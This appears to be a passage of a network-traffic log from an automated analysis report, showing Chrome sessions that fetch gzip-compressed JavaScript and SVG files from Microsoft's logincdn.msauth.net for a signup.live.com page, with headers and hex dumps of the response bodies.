2024-08-31 22:54:57 UTC	16384	IN	Data Raw: b1 a9 9f 14 ba a9 80 d7 87 04 36 f1 09 0a 0e 33 0c 72 12 a4 78 77 4b 5b 20 9a f4 e9 3a 6c be ba f8 88 e1 7b a7 d1 09 3f 14 30 fb 13 f4 7f a4 1d 8e 33 51 42 0d 0d cf 29 8e 0d 96 59 82 19 b9 cf 13 7c ad a5 de 2b b5 e6 30 b6 bb 29 29 90 a8 f9 4b 58 24 4f d7 28 8e 47 a1 bf 7c 28 df 53 fe fb 0d a4 54 67 a3 61 40 4b b3 fe 8a 61 04 d9 cb 59 ff 3d 87 51 ac b3 c9 30 10 dc 42 7e 4e c2 e4 18 ec 14 ae 7b 0d 8f 17 ec 35 50 45 e2 0c 6a c0 ae ce e8 0b af cd a4 0f a4 35 9d bb bc 3e dd 9f 80 0f f1 5e 55 e1 94 ef 91 3c 8b 82 c0 ae d0 6b f9 61 35 50 cf 44 75 11 4c 96 e7 b3 00 da 2f 73 2a 99 d5 6e fd 24 18 be 0f 28 a0 c6 cf 81 a9 18 24 ee 30 bb f0 27 71 86 12 40 f8 ce 68 ab 00 ac 77 85 ef 57 e8 ca bd f1 a9 6d d7 43 a5 34 7c 79 06 aa 09 2a 13 d8 46 ef c7 7c 42 1c 05 26 81 1f Data Ascii: 63rxwK[ :l{?03QB)Y\|+0))KX$O(G\|(STga@KaY=Q0B~N{5PEj5>^U<ka5PDuL/sn$($0'q@hwWmC4\|yF\|B&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49775	13.107.246.60	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:59 UTC	606	OUT	GET /shared/5/chunks/oneds-analytics-js_8c01a5c09df43fd8d323.js HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://signup.live.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://signup.live.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:59 UTC	826	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:59 GMT Content-Type: application/x-javascript Content-Length: 32811 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 09 Aug 2024 21:16:16 GMT ETag: 0x8DCB8B881B52A8D x-ms-request-id: 3833c618-e01e-002d-6c01-f84f88000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225459Z-16579567576j7nvvu5n0ytgs1c00000005u0000000000r18 x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-31 22:54:59 UTC	15558	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 dc bd 6b 57 db 48 b3 3f fa fe 7c 0a 5b 67 0e 5b 1a 1a c7 86 24 93 d8 51 bc 12 42 26 e4 06 13 c8 65 86 61 b3 84 dd 06 0d 46 f2 48 32 84 60 7f f7 53 bf ea 8b 5a b2 48 f2 ac ff 3e e7 c5 9e 35 c1 ea 8b 5a dd d5 d5 d5 55 d5 55 d5 f7 7e 6d b7 5e a6 59 6b 1a 8f 64 92 cb 56 9c 4c d2 ec 32 2a e2 34 69 cd a6 32 a2 ac 5c ca 56 9a c8 71 be 11 25 d1 f4 a6 88 47 f9 c6 3f f9 c9 a3 51 b7 17 3d 18 75 1f 8f 27 f7 b7 26 e3 47 e3 ad cd ad ce 3f 79 e7 ed ee f6 ce fb 83 9d 4e f1 b5 68 fd 7a ef ff f2 e6 68 a2 c8 e2 51 e1 0d fc 5c 4e 27 9d 6b 79 3a 8b 46 17 db e7 f3 e4 e2 e4 32 8f c7 32 29 e2 e2 e6 24 8f f3 39 a5 a3 f0 a7 6a 2d 16 47 c7 41 67 36 cf cf fd a3 a3 fb bf f5 8e c5 6d 6f 73 f3 b7 47 fd c9 3c 19 a1 ff 7e 22 a4 28 82 db a2 93 f9 32 10 45 67 Data Ascii: kWH?\|[g[$QB&eaFH2`SZH>5ZUU~m^YkdVL2*4i2\Vq%G?Q=u'&G?yNhzhQ\N'ky:F22)$9j-GAg6mosG<~"(2Eg
2024-08-31 22:54:59 UTC	16384	IN	Data Raw: 6c 56 86 a8 25 fd a2 f4 b5 4b 71 c3 bd 9a cf ff a0 97 d4 c3 ff 5f fb 97 38 c7 e0 1a bc c6 7d 7c b5 77 72 dd d3 bd 33 7d 33 7b d2 f0 af f8 08 27 9e c7 f6 a1 8f bf 95 e6 a9 63 ae bb 8a 8d 23 42 03 78 ba d1 1b d2 6f df c9 3d d1 b9 27 9e 3a 29 60 36 23 0d 6b 5c 14 6d 03 e9 6c 3e 25 02 be 37 83 d9 2d 11 cd 83 9b 9c e4 87 dd 64 92 1a 38 f3 86 57 84 26 9c 3e 73 a0 36 2a 0a 4c dd 9c 84 e7 c1 fc b4 cc 41 c0 d2 4a 15 95 a1 ae cf c8 0c f7 e3 f6 aa 7a a9 9a 4c dd 4b d5 cc 2c c2 19 95 27 ad c3 0c ac 02 34 25 6c a8 8d a2 93 aa bb 9b 3b 79 79 35 89 06 0d e5 55 ea b9 33 9a 55 79 2d 12 23 95 ab 71 4a 72 de 15 62 ed a5 b4 e9 a6 10 8e 13 de ea d5 2f 9a 4f 55 8c 92 b8 43 b8 55 e0 0e 4d 8e 1b ab de 76 32 49 62 8c 88 30 da ab e9 9c fb e8 ca b3 7b 75 5a 4d fc 90 b2 ac 4d 7f cc Data Ascii: lV%Kq_8}\|wr3}3{'c#Bxo=':)`6#k\ml>%7-d8W&>s6*LAJzLK,'4%l;yy5U3Uy-#qJrb/OUCUMv2Ib0{uZMM
2024-08-31 22:54:59 UTC	869	IN	Data Raw: 8f 6e e8 38 6f 64 59 f8 20 3b b4 3c 7b 00 a1 00 34 b8 17 af d3 b1 2e a6 35 fe 2a df b3 9b e8 24 4d 77 d3 e4 4a 76 f8 a6 d0 09 3d 82 36 07 40 c4 5e 1e 85 09 c2 7b be 29 51 5e f1 01 6b cf 55 6d 0c 88 6d a5 49 af aa 3b 83 02 35 da 35 fd d2 55 df 5c 26 38 98 04 e2 b2 e8 04 50 f6 01 2c a1 5c 6d ea 3b c5 95 df e2 7c 04 b4 35 27 15 5a 6d 39 fb 6e e5 10 56 53 5b 2d ee d0 86 d6 98 e0 b5 63 78 83 0d 68 69 4e b3 b1 99 8d 0d 4b 9c f3 8b 46 42 72 d5 3a 30 f0 75 d0 4c 21 a1 55 5a 9f 9d a1 19 67 cd 3a ad 9c 93 e4 b5 75 83 1c 10 ef 06 47 92 af 7d 0d af 14 7e dd 49 2e d3 83 e4 94 7e c5 30 0e 2d 09 27 d8 35 c7 46 be a6 b5 b0 7d 34 ac 3a 5a 86 e3 24 9e 4c e0 de 0e b2 78 02 84 48 38 c4 a9 cc 32 40 a0 f6 5c e7 45 44 e8 56 5a 7c 35 22 e1 68 23 46 af 6b be 7c 7e c3 b7 ba 6f b1 Data Ascii: n8odY ;<{4.5*$MwJv=6@^{)Q^kUmmI;55U\&8P,\m;\|5'Zm9nVS[-cxhiNKFBr:0uL!UZg:uG}~I.~0-'5F}4:Z$LxH82@\EDVZ\|5"h#Fk\|~o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49777	13.107.246.60	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:59 UTC	633	OUT	GET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://signup.live.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:59 UTC	807	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:59 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 27 Jun 2023 15:44:25 GMT ETag: 0x8DB772562988611 x-ms-request-id: 0527bf39-f01e-007c-6c4e-fbd204000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225459Z-16579567576ztstdfgdnkw0mpw00000005qg00000000agdq x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:54:59 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49776	13.107.246.60	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:59 UTC	620	OUT	GET /shared/5/images/2_bc3d32a696895f78c19d.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://signup.live.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:59 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:59 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 27 Jun 2023 15:44:22 GMT ETag: 0x8DB7725611C3E0C x-ms-request-id: 74876302-401e-007a-0316-fbde16000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225459Z-165795675762gt5gbs4b9bazh8000000059g00000000bus0 x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:54:59 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49778	13.107.246.42	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:59 UTC	398	OUT	GET /shared/5/js/signup-fabric_en_hjnWUmfm-pOUxYXWMUv1Yw2.js HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:59 UTC	820	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:59 GMT Content-Type: application/x-javascript Content-Length: 231091 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 20 Aug 2024 23:08:41 GMT ETag: 0x8DCC16D08882164 x-ms-request-id: 1870718b-801e-0066-44ce-fab3db000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225459Z-16579567576l8zffr7mt4xy2un000000059g000000002fv3 x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:54:59 UTC	15564	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec bd 69 77 db 38 d2 28 fc fd fd 15 b6 6e 8e 87 1c c3 8a 64 67 a5 c2 d6 4d 1c bb 93 ee 6c 1d 27 9d 4e bb 7d 7d 68 09 92 d8 91 48 85 a4 ec 38 b6 fe fb ad 05 2b 45 39 e9 99 67 9e 67 ee 7b 26 e7 c4 02 41 10 4b a1 00 54 15 6a b9 fd f7 cd 8d c3 bc d8 98 a6 03 99 95 72 23 cd 46 79 31 4b aa 34 cf 36 e6 53 99 40 56 29 e1 7f 3a ce 16 f3 9d 51 72 56 a4 83 53 99 b5 ff 2c db 2f 9e ef 1f bc 3a 3a 68 57 5f aa 8d bf df fe ff 36 47 8b 6c 80 df 05 e1 d5 79 52 6c 48 51 89 4c 14 22 17 69 7c f5 f0 6e 77 ef 6e 64 4a d0 bb f0 aa b5 c0 ea 2b a8 b2 6a f5 f0 9b 22 ce 82 bd 5d 28 1c 8a 3c be 1a 4c d2 e9 70 3f cf 2a f9 a5 7a 77 39 97 65 b4 d9 11 03 fb 5c 7b a4 d7 43 39 4a 16 d3 ea 4d 91 cf f9 39 2d e7 d3 e4 f2 55 32 a3 e2 63 59 3d ad 95 a0 ac 22 3d 97 Data Ascii: iw8(ndgMl'N}}hH8+E9gg{&AKTjr#Fy1K46S@V):QrVS,/::hW_6GlyRlHQL"i\|nwndJ+j"](<Lp?*zw9e\{C9JM9-U2cY="=
2024-08-31 22:54:59 UTC	16384	IN	Data Raw: 3d 8c f5 04 5b ad c9 ed c2 35 95 d0 b1 da e4 23 ba 57 fa c1 68 e4 5e e1 77 11 50 aa 7c ce 55 3b 72 d9 93 71 b6 94 91 52 0c e1 36 a0 7e a8 ec 88 15 f8 d0 27 81 97 61 a2 3b 61 be 55 66 82 47 65 1d 4a 3d 2f dc f5 34 c9 5c cb a3 cd 60 13 63 5b d3 15 84 e4 c3 8b 72 f6 36 5d ec 21 25 63 b6 16 a9 2c 4a 71 4d 4e b3 61 d4 52 24 65 49 66 40 7d 43 62 96 a8 cb 87 46 bb c8 ac 43 79 8d 84 6f 14 e3 be b5 b5 b9 19 74 ef 6d ad 2d 80 97 90 2e 8f 77 96 05 f6 90 94 2a 1a 81 a8 62 40 46 40 6c 38 34 59 19 0e 5d 00 b5 71 8b 7a 4e 71 e6 15 0e 01 64 11 c1 94 0f 97 d5 ad 43 b9 5b fe c0 21 0e a6 f9 80 ed 12 d0 8f 9e 42 bb 02 f5 84 81 ad 60 cd 20 66 ad a9 f1 40 c6 b5 ef 43 13 23 c1 10 c6 8e c2 fa a5 ab 33 8d 58 aa fd 95 b8 e9 5a d4 55 5d 0b ba 2d 31 2e 4d e8 89 dc 65 b1 52 39 bb 15 Data Ascii: =[5#Wh^wP\|U;rqR6~'a;aUfGeJ=/4\`c[r6]!%c,JqMNaR$eIf@}CbFCyotm-.w*b@F@l84Y]qzNqdC[!B` f@C#3XZU]-1.MeR9
2024-08-31 22:54:59 UTC	16384	IN	Data Raw: 35 34 c4 58 17 f8 d3 de 42 bc ab d2 e8 e2 52 a9 e5 42 17 03 b9 4c 28 dd c6 f3 db 37 1a e7 36 0e e6 18 4f e4 2a 17 01 15 d4 e3 da bb 27 57 89 53 d7 ce 39 25 a9 b3 35 f3 d0 d3 45 e6 63 f4 d8 87 75 6d 29 72 e0 75 a5 71 34 f7 68 16 6e 97 bd de c6 fc 4e da c7 3b 80 5e 27 a4 05 7a 56 33 54 7a 01 93 08 03 90 a3 e6 35 ed 80 41 cc 61 5c b4 16 40 02 0c da ab 41 a2 14 be 0c d9 a5 4e 5b 8a 3f db 28 1b a8 4d b7 8e 49 66 c0 cb bb 42 3e 7f 05 1c 06 7b 3b 96 7f 23 f8 cf 78 b2 27 b9 1b d9 cc 74 56 48 b3 f6 e4 b3 76 b3 30 84 8f 9c 31 2e a9 c6 a0 65 10 bb 4e 65 28 3b fb 89 70 c9 28 23 af 0f 95 63 1c b5 d4 85 31 aa eb 1b 20 92 75 99 03 03 42 5c 0f 50 75 ce 38 87 65 00 53 e2 0a cb 79 e3 e4 c7 61 26 a9 c4 3c 84 56 3e d9 dc 8e 2c c0 f8 6c 3b f3 ba 53 d9 cc aa c0 89 df 57 59 38 Data Ascii: 54XBRBL(76O*'WS9%5Ecum)ruq4hnN;^'zV3Tz5Aa\@AN[?(MIfB>{;#x'tVHv01.eNe(;p(#c1 uB\Pu8eSya&<V>,l;SWY8
2024-08-31 22:54:59 UTC	16384	IN	Data Raw: 78 96 a0 d4 b3 47 b1 86 38 9d 2c 93 b7 34 01 5a 24 99 9e 1e 3a 83 98 db 86 e3 e1 be 26 fd 7e ed 02 ef a3 44 33 4c e6 e3 e6 1e a6 bb 19 79 ed 4d a7 f6 1b d6 5d ed 15 33 f9 e6 6f e9 8c a9 eb 75 5b da 84 75 58 a3 3c 4b e4 23 8b 0e 27 e5 1c d3 18 c0 eb e8 59 2b 47 d0 fb 1b 03 c6 d8 14 96 c5 7c f1 5b 17 63 5f b9 f3 05 ef bc 16 a2 fd 9d 2f 58 e4 69 ef a2 3e 92 95 bb 51 fd be 19 7c 65 0f 53 79 6d a9 42 e8 48 72 7a 74 dd 93 be 47 4a cc a3 df 21 96 14 d4 5f c5 fa e3 20 02 98 ee 88 5e 19 cf 2e 74 a8 cf 2c f8 8c 6e 34 b7 95 28 cb 56 42 87 a2 11 d9 38 58 85 ae 98 2f b3 3e 83 e2 81 f4 cc 65 5d 1c 26 65 15 ea 87 b7 dc 77 43 18 d6 9c a9 89 3f 71 ae 48 66 86 43 ef 46 96 08 2e 5b 04 1a f1 c4 1a d5 a6 2c 69 d9 b3 d3 e2 a5 ee 90 0f 67 64 09 e4 ca d8 dc 48 14 ca ed 40 08 3d Data Ascii: xG8,4Z$:&~D3LyM]3ou[uX<K#'Y+G\|[c_/Xi>Q\|eSymBHrztGJ!_ ^.t,n4(VB8X/>e]&ewC?qHfCF.[,igdH@=
2024-08-31 22:54:59 UTC	16384	IN	Data Raw: 7a 18 44 56 ea 35 27 8e db 5b 59 19 a3 cf ef 47 36 67 de 44 61 44 c9 8c 84 33 8c c1 50 fe 0e b7 46 37 3f 85 9b cb 4f 9e 6c 75 90 18 d3 25 76 3b 9e 87 ac 06 24 e8 bc ca b8 5e 50 7d 48 01 cb ab 44 4e 63 00 06 da 1d ca 8e 0f c6 af b1 1f 4d f8 e0 45 ae 0e 08 e0 32 15 60 80 4c 84 d8 d6 ef 29 b8 84 31 3b d0 40 4b 70 61 65 ef 7a 75 f6 a0 3a d9 53 98 a4 e3 52 dc 39 54 38 85 a3 8c ce c3 0d e6 86 ce b2 ad 62 72 40 4b 34 52 7b 4c 0c 8d 5e b7 8c ee bd 81 fb 55 40 62 2f 57 57 a8 d6 9f 89 ba 75 63 79 a3 a0 20 07 72 78 df 25 17 cf eb e9 a6 ed 9f 08 e0 d3 5d aa e9 99 cf bb 05 4a 06 ef 91 7e 31 18 76 ed 04 24 23 80 be 1a 59 d6 53 dc 44 de 3f 98 73 59 a7 d7 a6 2d 02 58 c2 c4 e0 3a 8e 7d 06 6b a3 9e 7b a3 c0 37 ee 9f 16 b2 33 39 3b a5 c5 1c e1 c7 55 6a 95 ee c0 5f c4 69 52 Data Ascii: zDV5'[YG6gDaD3PF7?Olu%v;$^P}HDNcME2`L)1;@Kpaezu:SR9T8br@K4R{L^U@b/WWucy rx%]J~1v$#YSD?sY-X:}k{739;Uj_iR
2024-08-31 22:54:59 UTC	16384	IN	Data Raw: 24 a8 7a 30 ef 9c cd 94 a6 5c 97 d7 f9 dc f1 3d c0 96 27 df 6d 47 67 bd ee 18 4f ce 73 be 55 b4 fa 56 9a b0 8b c2 3a d0 94 b5 1d 98 a9 38 64 80 b8 ef 08 60 6f 04 0c 6b 34 fd 68 6b fa 1d fe 29 01 66 fe 9e 7f 3c 05 c9 5d df 57 ae 94 71 4b c8 29 43 14 be 1b db 2f dc 66 74 f4 59 39 5e 9e 90 09 d7 21 0a 55 85 25 dd 62 43 be cd 7a cc ee 02 d2 09 a2 ea 3e e6 1d d2 c9 3c 9f 3d 99 1c 66 47 93 e5 54 12 c4 98 de 52 e8 34 db 95 19 98 e1 0b b5 7d 20 49 5c a7 78 c6 94 09 45 db 21 cd da 0e eb 11 6c cc 5c 95 4d 35 3e 67 2c 66 38 7b b4 07 83 22 20 71 86 84 51 8e f2 83 f8 72 47 fe f2 3e 57 03 af 14 f7 23 99 34 c7 dc 33 18 93 05 26 2c dc b7 73 16 21 83 4d 1e bb 1a b9 86 bb eb 1f 72 f6 80 51 a6 5f 33 c4 f1 b4 5e e0 02 68 69 0f 56 1b ab 7c 40 f5 b5 b2 ec 34 19 d4 de 52 ea 1d Data Ascii: $z0\='mGgOsUV:8d`ok4hk)f<]WqK)C/ftY9^!U%bCz><=fGTR4} I\xE!l\M5>g,f8{" qQrG>W#43&,s!MrQ_3^hiV\|@4R
2024-08-31 22:54:59 UTC	16384	IN	Data Raw: a7 35 54 c9 d3 9e 41 b3 f5 73 1d bc 55 26 b2 6f d1 f1 78 2d 7f d3 b9 0f de c8 ce 66 20 fc 31 a5 b7 f6 20 c0 6a 83 49 18 ad 06 b3 2c a1 0f 17 b3 e2 8c 95 5d 6c d3 ca 7b d0 c7 8a 79 af 14 92 39 73 c0 4c 14 65 eb e2 a1 5b e7 2e a2 39 50 99 63 7a b8 6e a8 29 ea 4b 28 48 8d e3 f9 e3 5c 3c dd 2c 81 95 37 d1 a5 7d 63 f8 b7 4c 6e e5 9a 9e 3f 04 95 a9 f1 98 98 cf 6e 6d 1b 40 19 7c e6 5b 5c 0d 14 2b 50 bd bf 57 9a ea 37 f9 37 ae 5f 1d ac f6 50 9a c1 7c 70 69 ba b6 86 59 dd 3b 18 64 57 3d fd 8d b8 e7 b9 05 71 2c ff 0b 51 20 73 f0 df bf 6f 0e fe fa db 70 f0 df 77 e2 e0 bf 5d 32 07 ff fd 8a 38 f8 6f 57 c0 c1 ff e0 db 43 1c c9 af 19 61 cb c3 9b 36 8f 30 e9 70 ce 65 a6 39 71 ee fe 65 87 ee fc 68 1d 16 19 ff 69 3e 9e d9 c9 f0 53 97 b6 ab 17 8e d6 c8 84 eb 59 ad a7 e2 0a Data Ascii: 5TAsU&ox-f 1 jI,]l{y9sLe[.9Pczn)K(H\<,7}cLn?nm@\|[\+PW77_P\|piY;dW=q,Q sopw]28oWCa60pe9qehi>SY
2024-08-31 22:54:59 UTC	16384	IN	Data Raw: 89 81 dd b3 cb 37 b0 47 53 7e e2 2f b3 d0 20 2e b1 88 e0 40 d4 68 20 c5 9b d8 23 be 18 04 c7 8b 83 82 7d 38 d8 81 c1 30 89 3c 41 72 96 f6 f1 9c d0 4f 51 b7 d0 ca 16 65 49 45 2b 10 28 98 02 a1 c2 78 89 91 84 8c 80 2e 56 9c f6 2d d4 9d d2 87 2f a8 fc 15 05 61 19 98 2c 5b 19 b3 50 76 1d 4d b8 91 25 b5 95 a5 68 5c d3 ae e0 86 fb fe fe 4e 5c 5c 37 ae ae 27 ca 45 29 d1 1d 9b 9f d7 8b d3 d4 45 26 59 9d 12 a1 29 83 fb 47 6a e7 f4 0b 81 fd 55 36 27 76 81 0a 84 13 f8 0b d4 49 23 7a 34 30 67 5b 94 a7 a1 3d ba 68 e6 95 b2 10 c8 0a 87 c1 08 ba a1 da 10 85 5d 80 d9 ad c1 1c e6 18 86 f0 d7 98 a8 ef f0 84 11 69 af c2 36 40 33 66 6c 7c 44 1b 1f 61 e3 a3 6b 45 db c0 b9 68 16 d8 db 94 cc db 81 c6 bc 01 6f c2 1b 14 93 0d 78 b6 36 00 96 12 e7 17 01 fa 58 38 e9 00 7a fd 8a 86 Data Ascii: 7GS~/ .@h #}80<ArOQeIE+(x.V-/a,[PvM%h\N\\7'E)E&Y)GjU6'vI#z40g[=h]i6@3fl\|DakEhox6X8z
2024-08-31 22:54:59 UTC	16384	IN	Data Raw: a1 73 31 16 c2 e9 34 1a ae 62 48 e3 21 2c 9e c5 84 c1 ab 63 02 5c 4e ab de 9b 37 d9 d0 48 31 6a e1 5d 11 bb 90 5b 21 3e 9a bd 8e 6f 01 fb d0 b3 80 31 dd e3 da e5 05 e2 e5 de 6f 92 d4 bb 0f 50 0e 5f ba 49 e0 1d b9 b7 c1 08 f5 8c 60 b0 87 3e 86 5b 90 cd d9 68 ef 39 70 28 64 f9 18 46 1d b6 a6 6e 36 a6 8a 33 f8 48 7d 37 19 8c 61 bc 92 57 a9 7f 81 0a c6 68 ed 3c 75 e0 37 0c 30 05 02 e4 b5 f5 36 60 e9 15 a0 22 57 a0 f7 97 70 81 ad 07 d9 16 50 28 bc 25 7b c6 b0 23 1b a5 f7 56 aa 0d 03 70 19 10 31 a6 a5 28 ad 04 61 30 b1 c8 01 fc 94 bb 80 aa f2 7c 17 42 27 32 ad f9 80 0a 8b 2d 4d 9d 3b f4 98 3f 73 ba f8 67 5a 5e 94 fc f9 ad c6 17 57 b0 be ba f0 83 6e 8c c9 d5 e1 96 85 5e 02 30 04 67 96 c5 11 70 7a 8d 46 fd 3a f5 c3 a1 50 cd ae 42 bf ad 2d 7a 27 cb dc 1f fd 7b 54 Data Ascii: s14bH!,c\N7H1j][!>o1oP_I`>[h9p(dFn63H}7aWh<u706`"WpP(%{#Vp1(a0\|B'2-M;?sgZ^Wn^0gpzF:PB-z'{T
